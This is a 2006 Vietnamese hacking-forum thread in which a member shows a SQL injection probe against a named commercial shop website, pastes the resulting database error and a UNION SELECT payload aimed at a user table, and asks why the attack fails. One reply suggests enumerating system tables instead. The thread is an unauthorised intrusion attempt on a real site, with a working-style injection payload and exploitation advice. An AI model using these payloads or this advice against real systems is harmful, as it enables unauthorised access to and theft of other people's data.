banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Forum Index Thảo luận thâm nhập Ai có thể giải đáp cho mình lỗi SQL ịnect ko  XML
  [Question]   Ai có thể giải đáp cho mình lỗi SQL ịnect ko 03/08/2006 03:26:29 (+0700) | #1 | 12042
minami
Member

[Minus]    0    [Plus]
Joined: 02/08/2006 16:15:58
Messages: 1
Offline
[Profile] [PM]
Mình tìm được trang bị lỗi thế này
http://www.questarhomevideo.com/shopdisplayproducts.asp?cat=7'
Microsoft JET Database Engine error '80040e14'

Syntax error in query expression 'cc.intcatalogid=p.catalogid and cc.intcategoryid=c.categoryid and c.catdescription like '7'%' and hide=0 order by cname'.

/shop$db.asp, line 478
Mình dùng query này để khai thác
union%20select%201%20from%20tbluser%22having%201=1--
tại sao nó không xuất hiện lỗi mà trả về 1 trang hiện hành của nó
Xin mọi người giúp đỡ lối tại sao...
[Up] [Print Copy]
  [Question]   Ai có thể giải đáp cho mình lỗi SQL ịnect ko 03/08/2006 03:59:00 (+0700) | #2 | 12050
BigballVN
Elite Member

[Minus]    0    [Plus]
Joined: 12/06/2005 07:25:21
Messages: 610
Offline
[Profile] [PM]
Hình như link của bạn die rồi. Bạn kiểm tra lại xem
[Up] [Print Copy]
  [Question]   Re: Ai có thể giải đáp cho mình lỗi SQL ịnect ko 08/08/2006 21:14:13 (+0700) | #3 | 13216
evh
Member

[Minus]    0    [Plus]
Joined: 05/07/2005 14:51:51
Messages: 4
Offline
[Profile] [PM]
thì nó không tìm thấy row nào trong DB nên mạc định trả về trang thông báo, mà đã hiển thị thông báo lỗi trong dòng đầu rồi bạn không cố gắng môi cấu trúc dữ liệu trong DB của chúng nó mà Inject mã vào mà phải dùng UNION chi cho mệt , khai thác 2 view SYSOBJECT, SCHEMA_TABLE
[Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|